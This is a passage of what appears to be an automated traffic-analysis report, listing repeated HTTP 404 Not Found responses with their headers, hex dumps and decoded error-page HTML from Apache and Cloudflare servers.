20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 29 Nov 2024 02:53:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 29 Nov 2024 02:53:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 29 Nov 2024 02:53:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlJzUbGtpvJ4nRMnmY%2Fo8lIiy1iJE70JnIjljUqeOlt%2BaFmegZji4KCgh7E%2BtXIQrV%2BFyyVW1sGnnzBApCo8nZQLghZeQ7nWcMHyvIOMMSYF1AwHNEsUjoIzJHp8e3cUdoAKfybqHZHHhoU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f504c096c8c87-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTPcR%2FpQcvep%2BpVG3tbdgPcXDwCTE3vUbHKoB8OjpdTxdOnnI6J9yVoqPnI3LNl0N%2BRNF9ULRpN3CIOOeLnoKYDge5zd8BH1nB6Z74WWjXUldklPxMiV1pZlMY5hvpjEXf9IbXU%2F5paewUM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f505d3cd95e5f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2305&min_rtt=2305&rtt_var=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnXrTVLz%2BjpjH2ug5OK0gfj84yl88xeCSVXpb0eI3RCU8M4br5DllwOnmJhkN%2FG9Hi2xI8100SQUeFbc3Y5ULPdIDI0161PDN10DgGcUbUQGAQsiTPh2pjQjbVcAslX0EPZcFwIwLqfgEmw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f506d6b0a438b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1769&rtt_var=884&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1824&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:54:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxybTklE2o0lQgGMIE1phCKMH2%2FJXY3iJC5HzyWVEihOWIwsN%2FGOt022HRs6dQtbwja1irFdhGuPgzzCt4eXeObh8ZmN4K2L%2FCRqdYplsd8b288xymquik0gj2Xuut9GYlK%2FpDpK0rtbPpE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e9f507e5d9032fc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1879&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=516&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Nov 2024 02:55:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 